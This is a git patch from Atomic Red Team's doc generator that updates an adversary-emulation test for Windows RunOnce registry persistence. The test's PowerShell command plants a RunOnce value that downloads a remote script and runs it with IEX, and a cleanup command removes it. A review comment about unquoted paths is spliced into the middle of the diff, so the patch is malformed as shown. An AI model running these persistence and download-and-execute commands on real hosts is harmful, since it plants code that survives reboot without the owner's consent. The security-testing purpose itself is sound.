From 877da0ba7d174ae292cbc2b57cefdbe928ac96dd Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 2 Mar 2020 20:31:47 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/T1060/T1060.md | 7 ++++---
 atomics/index.yaml | 11 ++++++++---
 2 files changed, 12 insertions(+), 6 deletions(-)

diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index a987a698..2bd52117 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -114,17 +114,18 @@ RunOnce Key Persistence via PowerShell
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | powershell.exe|
+| reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce|
-#### Attack Commands: Run with `powershell`!
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
 ```
-$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+$RunOnceKey = "#{reg_key_path}"
 set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
 ```
 #### Cleanup Commands:
 ```
-Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
+Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
 ```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 45048ccd..175a21dc 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
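Review bot: The new cleanup line `Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore` interpolates the `reg_key_path` input unquoted, while the attack command two lines above quotes the same value as `"#{reg_key_path}"`; a supplied path containing spaces or PowerShell metacharacters would parse differently in the two commands, and `-ErrorAction Ignore` would then hide that the RunOnce value was never removed from the test host. Quoting it to match, `Remove-ItemProperty -Path "#{reg_key_path}" -Name "NextRun" -Force -ErrorAction Ignore`, keeps setup and cleanup consistent on the same input. The `cleanup_command` in the index.yaml hunk carries the same unquoted form, and since both files in this commit are generated, the correction presumably belongs in the atomic's source yaml rather than in these outputs.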
@@ -3785,13 +3785,18 @@ persistence: description: Thing to Run type: Path default: powershell.exe + reg_key_path: + description: Path to registry key to update + type: Path + default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce executor: name: powershell + elevation_required: true command: | - $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" + $RunOnceKey = "#{reg_key_path}" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' - cleanup_command: 'Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force - -ErrorAction Ignore + cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" + -Force -ErrorAction Ignore ' T1053: